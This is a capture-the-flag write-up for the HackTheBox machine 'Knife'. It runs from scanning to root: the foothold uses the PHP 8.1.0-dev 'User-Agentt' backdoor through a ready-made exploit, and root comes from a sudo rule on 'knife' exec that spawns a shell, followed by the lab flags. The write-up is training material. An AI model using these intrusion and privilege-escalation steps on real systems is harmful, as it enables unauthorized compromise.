ターゲット // Knife
PlatformHTB
OSLinux
DifficultyEasy
IP10.129.44.1

Recon#

Nmap#

1

nmap -sC -sV -oN nmap/initial 10.129.44.1
▶ Nmap output
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH
80/tcp open  http    Apache httpd 2.4.6

OS: Linux (Ubuntu, kernel 5.4.0-80-generic)

Enumeration#

Port 80 - Web App#

Running Nuclei against the target immediately flags something critical:

1

[php-zerodium-backdoor-rce] [http] [critical] http://10.129.44.1

That’s a big red flag. The server is running PHP 8.1.0-dev which contains a backdoor planted by attackers in the PHP source code repository.

Foothold#

PHP 8.1.0-dev Backdoor RCE#

Researching php-zerodium-backdoor-rce leads to this writeup and an ExploitDB entry.

The backdoor allows arbitrary code execution via a crafted User-Agentt header (note the double t). There are ready-made exploits available – just point and shoot:

1

python3 exploit.py http://10.129.44.1

We land a shell as james.

Privilege Escalation#

GTFOBins - knife#

Checking sudo permissions:

james@knife

$ sudo -l
User james may run the following commands on knife:
    (root) NOPASSWD: /usr/bin/knife

knife is a Chef infrastructure tool and it’s on GTFOBins. Instant root:

1

sudo knife exec -E 'exec "/bin/bash"'

Proof#

root@knife

root@knife:/home/james# cat user.txt
ba62e576a2e7e468eb51b8bf13be1301
root@knife:/home/james# cat /root/root.txt
8a29936c83b58483940c3765b3792ff9

Key Takeaways#

[ ノート ]
  • Always check response headers and run Nuclei – the PHP backdoor was immediately flagged
  • sudo -l is always the first privesc check – GTFOBins makes it trivial when a listed binary is available
  • This box took ~30 minutes, very straightforward attack chain